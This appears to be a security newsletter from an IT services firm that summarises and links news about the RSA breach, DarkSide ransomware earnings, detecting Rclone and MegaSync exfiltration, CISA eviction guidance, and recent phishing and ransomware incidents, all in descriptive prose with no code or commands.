Proactively Detect and Block These Exfiltration Applications

NetStandard’s Security Minute Series 

In 2011, the IT world was shocked to learn that RSA was hacked, and the seed values for SecurID tokens were stolen. This left every SecurID token in the world vulnerable and exposed – if you were in the industry at the time, you surely remember this incident. Now, 10 years later, the NDAs have expired and the full story is out: The Full Story of the Stunning RSA Hack Can Finally Be Told | WIRED

• Spoiler alert: It began with a phishing email, containing a malicious Excel attachment titled “2011 Recruitment Plan.” It’s a trap!

Want to play with Microsoft 365 E5 in a sandbox, and really get hands-on with all of the advanced tools and functions? Get a free, renewable E5 developer subscription here (really!): Developer Program – Microsoft 365

The DarkSide ransomware gang, which was responsible for Colonial Pipeline, is believed to have made over $90 million in just nine months, based on transfers into its Bitcoin wallet. The average payment was $1.9 million: Darkside gang estimated to have made over $90 million from ransomware attacks | The Record by Recorded Future
In a ransomware incident, the attackers normally try to exfiltrate data out of the network, so they can threaten to leak that data if you don’t pay the ransom. Two ways this is done are through Rclone and MegaSync. How to proactively detect and block these applications: Rclone Wars: Transferring leverage in a ransomware attack (redcanary.com)
CISA has published detailed technical guidance for how to evict an attacker from your network, once that attacker has breached Active Directory and/or Azure Active Directory. It includes a lot of good advice in general: Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise | CISA
On another note…

• It’s possible to remove the “External Sender” warnings from emails, by simply using CSS: Phishing Scammers Remove ‘External Sender’ Email Warnings Impersonating Internal Users (knowbe4.com)
• A new malware tactic is to pretend that it encrypted your files, without actually encrypting them: https://twitter.com/MsftSecIntel/status/1395138347601854465?s=20
• A week after insurance company AXA announced that it will stop providing insurance coverage for ransomware extortion payments, it itself was hit with the Avaddon ransomware: Insurer AXA hit by ransomware after dropping support for ransom payments (bleepingcomputer.com)